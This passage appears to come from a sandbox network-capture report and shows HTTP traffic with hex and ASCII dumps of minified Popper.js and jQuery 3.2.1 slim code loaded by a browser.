                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65
                                                                                                                  Data Ascii: var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['borde
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e
                                                                                                                  Data Ascii: :p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64
                                                                                                                  Data Ascii: ht:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.wid
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e
                                                                                                                  Data Ascii: .warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instan
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69
                                                                                                                  Data Ascii: s.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passi
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75
                                                                                                                  Data Ascii: rn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){retu
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                  Data Ascii: rn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d
                                                                                                                  Data Ascii: rn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.1649754151.101.2.1374432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:35 UTC672OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                  Host: code.jquery.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:35 UTC610INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 69597
                                                                                                                  Server: nginx
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                  ETag: "28feccc0-10fdd"
                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Age: 2862445
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:35 GMT
                                                                                                                  X-Served-By: cache-lga21963-LGA, cache-dfw-kdal2120061-DFW
                                                                                                                  X-Cache: HIT, HIT
                                                                                                                  X-Cache-Hits: 6, 0
                                                                                                                  X-Timer: S1729606115.224204,VS0,VE1
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                  Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                                  Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                  Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                                  Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                                  Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                                  Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                                  Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                                  Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                                  Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
